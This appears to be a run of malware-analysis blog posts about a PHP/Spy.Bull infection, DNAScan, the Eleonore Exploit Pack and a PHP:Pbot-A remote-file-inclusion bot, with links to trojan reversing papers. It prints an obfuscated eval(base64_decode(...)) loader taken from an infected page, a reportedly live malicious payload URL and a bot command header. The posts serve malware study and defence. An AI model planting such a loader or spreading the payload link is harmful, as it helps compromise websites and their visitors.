Today we're going to locate a PHP/Spy.Bull infected target, Cryptoanalyze the
encoded blocks involved in and finally analyze the deriving thread.

It's clear that cryptanalysis part is is superabundant for the study of the actual threat, what I want to show here is a different, more pragmatic and general approach to the problem.

This procedure can be used in much more complex contexts, where encryption is stronger that our case and there is an important lack of informations.

This malicious PHP malware affects compromised Websites, with an encrypted page, the classical anatomy of an infected URL is

http://____.dk/____/_____/one.txt??

Let's now see this page.

eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9
c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF
9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfW
Ck7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=='));?>

As you can see we have two blocks of encrypted data:

1. The first one that does not help us in this moment because we don't have any explicit information about the encryption algorithm used, but we can pragmatically how complex is this cipher text.
2. We can decode the second block, its easly Base64 Encoded.

At a first look it's obvious that the first code block presents an encryption that should be not so hard. But this is only a supposition, we have to demonstrate:

1. It's really easy how appears?
2. We can have a misure of how many complex is?

Could happen that an apparently easy block it's the result of complex operations.

Hi,

This is a paper split into two episodes, the first two can be read here

First
http://evilcodecave.blogspot.com/2009/11/dnascan-malware-analysis-from-browser.html
Second
http://evilcodecave.blogspot.com/2009/11/dnascan-malware-analysis-from-browser_15.html

In this blog post we will investigate deeply the effective functionalities of DNAScan,
that can be seen as a set of Threads that accomplish different networking functionalities like:

* Server Functionalities
* Client Functionalities
* Malicious File Exchange
* Generic Backdoor

Let's start from the beginning of network functionalities setup, initially from the main thread is called WSAStartup used to initiate the Winsock DLL, successively is called a classical socket() and immediately after WSAIoctl

Hi,

Today we will see how works Eleonore Exploit Pack directly from an infected website.

Essentially Eleonore Exploit Pack is a collection of Exploits and Data Statistics Collectors, this is the 'marketing' presentation of the exploit pack:

*---------------------------------------------------------------*
Hello!
I present new actual russian exploits pack "Eleonore Exp v1.2"

Exploits on pack:
> MDAC
> MS009-02
> Telnet - Opera
> Font tags - FireFox
> PDF collab.getIcon
> PDF Util.Printf
> PDF collab.collectEmailInfo
> DirectX DirectShow
> Spreadsheet

Today I'll dissect a website infected with PHP:Pbot-A according to Avast naming convenction.

Be careful link reported is still alive!

From a malicious domains DB emerged this infected URL

http://jamera2.justfree.com/cmdupload2.txt

As you can see it seems a classical .txt file, but this is a classical evidence of RFI Infection.

MD5 : da67134fc6953201d3556f5fedbcd50d

/*
*
* #crew@corp. since 2003
* edited by: devil__ and MEIAFASE
* Friend: LP
* COMMANDS:
*
* .user //login to the bot
* .logout //logout of the bot
* .die //kill the bot
* .restart //restart the bot

Hi,

Here my last paper.

Abstract

Trojan-GameThief.Win32.Magania, according to Kaspersky naming convention, monitors the user activities trying to obtain valuable information from the affected user, especially about gaming login accounts. This long tutorial analyze this malware but is also a general document which explains how to analyze a modern nested-dolls malware.

http://www.accessroot.com/arteam/site/download.php?view.313

Regards,
Giuseppe 'Evilcry' Bonfa'

Hi,

Here the reverse engineering of Backdoor UltimateDefender
a malware that presents also Rootkit Functionalities.

http://evilcry.netsons.org/tuts/Mw/Backdoor-UltimateDefender.pdf

Regards,
Giuseppe 'Evilcry' Bonfa'

Hi,

Here I've linked the first two parts of W32/Skintrim Reverse Engieering of a Badly Coded Malware
a Malware that is not working and appears really little, I've repaired it and I'm reversing it completely,
Skintrim appeared to be really articulate.

Here the first three blog posts:

#1
#2
#3

Soon I will publish the #4 part.

Regards,
Giuseppe 'Evilcry' Bonfa'

Hi,

Yesterday I've published a blog post about Spam Domain Spreading over MSN

http://evilcodecave.wordpress.com/2008/08/26/the-msn-dark-chain-of-spam-yopiczcom-and-others/

Regards,
Giuseppe 'Evilcry' Bonfa'

Hello,

In the following paper you can read the analysis of Win32OnlineGames, a well spreaded Trojan that acts as Password Stealer for E-Gaming Services.

Win32OnlineGames

Hope you like it!

Regards,
Giuseppe 'Evilcry' Bonfa'

Hello,

Here you can find a Reverse Engineering Analysis of Trojan-DownloaderWin32Small a diffused Trojan that is usually spreaded through Websites.

Trojan-DownloaderWin32Small

Have a nice read..

Regards,
Giuseppe 'Evilcry' Bonfa'